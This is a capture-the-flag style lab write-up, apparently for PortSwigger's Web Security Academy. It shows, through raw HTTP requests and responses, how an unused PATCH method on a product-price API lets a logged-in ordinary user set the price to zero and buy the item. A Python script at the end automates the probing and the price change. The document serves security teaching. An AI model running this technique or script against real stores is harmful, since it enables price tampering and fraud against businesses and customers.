# Lab #3: Finding and exploiting an unused API endpoint

First we analyze the traffic. Interacting with a product generates the following request:

```
GET /api/products/3/price HTTP/2
Host: 0aeb00d00435a3298148758900bd0022.web-security-academy.net
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Priority: u=1, i


```

And the response:

{% code overflow="wrap" %}

```
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 98

{"price":"$15.45","message":"Buy quick, we are low on stock! 5 purchased in the last 42 minutes!"}
```

{% endcode %}

If we change the request method to OPTIONS:

```
OPTIONS /api/products/3/price HTTP/2
Host: 0aeb00d00435a3298148758900bd0022.web-security-academy.net
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Priority: u=1, i


```

This responds with:

```
HTTP/2 405 Method Not Allowed
Allow: GET, PATCH
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 20

"Method Not Allowed"
```

{% hint style="info" %}
The OPTIONS request is rejected with a 405, but the `Allow: GET, PATCH` header reveals that the endpoint also accepts PATCH. The front end only ever sends GET to this endpoint, so PATCH is an unused method worth probing.
{% endhint %}

Sending a PATCH request returns a 401, which shows that this method requires authentication:

```
PATCH /api/products/3/price HTTP/2
Host: 0aeb00d00435a3298148758900bd0022.web-security-academy.net
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Priority: u=1, i


```

The response:

```
HTTP/2 401 Unauthorized
Content-Type: application/json; charset=utf-8
Set-Cookie: session=VO2gWYDu5GJLUNPoqfG0VRoRiyGokldK; Secure; HttpOnly; SameSite=None
X-Frame-Options: SAMEORIGIN
Content-Length: 14

"Unauthorized"
```

We log in and resend the request, now carrying the session cookie:

```
PATCH /api/products/3/price HTTP/2
Host: 0aeb00d00435a3298148758900bd0022.web-security-academy.net
Cookie: session=xDsx2QXEtAEA5PeYCKRf1cijXpaQfNkf
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Priority: u=1, i


```

Now a different error appears:

```
HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 93

{"type":"ClientError","code":400,"error":"Only 'application/json' Content-Type is supported"}
```

Following the error message, we add a `Content-Type: application/json` header and an empty JSON body:

```
PATCH /api/products/3/price HTTP/2
Host: 0ac8003604fc3794817011e300e70026.web-security-academy.net
Cookie: session=nTtfcqRLC1ERYUwuAxqNvPJIEI3W2RBD
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Content-Type: application/json
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Content-Length: 2

{}
```

Which produces this error:

```
HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 77

{"type":"ClientError","code":400,"error":"'price' parameter missing in body"}
```

Following the error message again, we add the `price` parameter to the body:

```
PATCH /api/products/3/price HTTP/2
Host: 0ac8003604fc3794817011e300e70026.web-security-academy.net
Cookie: session=nTtfcqRLC1ERYUwuAxqNvPJIEI3W2RBD
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Content-Type: application/json
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Content-Length: 11

{"price":0}
```

This request changed the product's price. Note that the session belongs to an ordinary user: the endpoint checks that the caller is logged in but never checks that the caller is authorized to edit prices.

```
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 17

{"price":"$0.00"}
```

Then we buy the product at the new price:

<figure><img src="/files/E5rX3VkAVituly9sDsXz" alt=""><figcaption></figcaption></figure>
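The whole procedure above (OPTIONS to read `Allow`, then PATCH with a JSON body, adjusting to each error the API returns) can be scripted. The following is an added example written for this page, not code from the lab or from PortSwigger. It assumes you already have a valid `session` cookie from logging in through the browser, and the lab host in `main()` is a placeholder you replace with your own instance. The pure helpers (`parse_allow`, `unused_methods`, `diagnose`) work offline on the responses captured on this page; `probe_and_patch` performs the live requests.

```python
"""Probe an API endpoint for methods the front end never uses, then exercise them.

Added example for the "unused API endpoint" lab writeup; not the lab's own code.
"""
import json
import sys
import urllib.error
import urllib.request

# Methods actually observed in browser traffic for /api/products/<id>/price.
OBSERVED_METHODS = frozenset({"GET"})


def parse_allow(header_value):
    """Turn an Allow header such as 'GET, PATCH' into an uppercase set."""
    if not header_value:
        return set()
    return {m.strip().upper() for m in header_value.split(",") if m.strip()}


def unused_methods(allow_header, observed=OBSERVED_METHODS):
    """Methods the server advertises in Allow but the client never sends."""
    return sorted(parse_allow(allow_header) - set(observed))


def diagnose(status, body):
    """Map the API's response to the next adjustment, mirroring the lab's error loop."""
    if status == 401:
        return "login"            # "Unauthorized": send a session cookie
    if status == 400:
        try:
            err = json.loads(body).get("error", "")
        except ValueError:
            err = body
        if "Content-Type" in err:
            return "set-json-content-type"
        if "parameter missing" in err:
            return "add-parameter"
        return "other-400"
    if status == 200:
        return "ok"
    return f"http-{status}"


def request(url, method, session=None, body=None):
    """Send one request; return (status, lowercase-keyed headers, body text).

    4xx/5xx responses are returned rather than raised so we can inspect them.
    """
    headers = {"Accept": "application/json"}
    if session:
        headers["Cookie"] = f"session={session}"
    data = None
    if body is not None:
        data = json.dumps(body).encode()
        headers["Content-Type"] = "application/json"
    req = urllib.request.Request(url, data=data, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req) as resp:
            return resp.status, {k.lower(): v for k, v in resp.headers.items()}, resp.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, {k.lower(): v for k, v in e.headers.items()}, e.read().decode()


def probe_and_patch(base, product_id, session, new_price):
    """OPTIONS the price endpoint; if PATCH is advertised, set the price via JSON."""
    url = f"{base}/api/products/{product_id}/price"
    _, hdrs, _ = request(url, "OPTIONS")
    extra = unused_methods(hdrs.get("allow", ""))
    print(f"[*] Allow: {hdrs.get('allow', '<none>')} -> unused methods: {extra}")
    if "PATCH" not in extra:
        return None
    status, _, text = request(url, "PATCH", session=session, body={"price": new_price})
    print(f"[*] PATCH -> {status} ({diagnose(status, text)}): {text}")
    return status, text


def main():
    # Placeholder lab URL and session value: replace with your own instance and cookie.
    base = sys.argv[1] if len(sys.argv) > 1 else "https://YOUR-LAB-ID.web-security-academy.net"
    session = sys.argv[2] if len(sys.argv) > 2 else "YOUR_SESSION_COOKIE"
    probe_and_patch(base, 3, session, 0)


if __name__ == "__main__":
    main()
```

Run it as `python3 probe.py https://YOUR-LAB-ID.web-security-academy.net <session-cookie>`. The `diagnose` step is what makes the loop on this page repeatable: a 401 means add the session, a 400 mentioning `Content-Type` means send JSON, and a 400 mentioning a missing parameter means the body schema needs that field.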

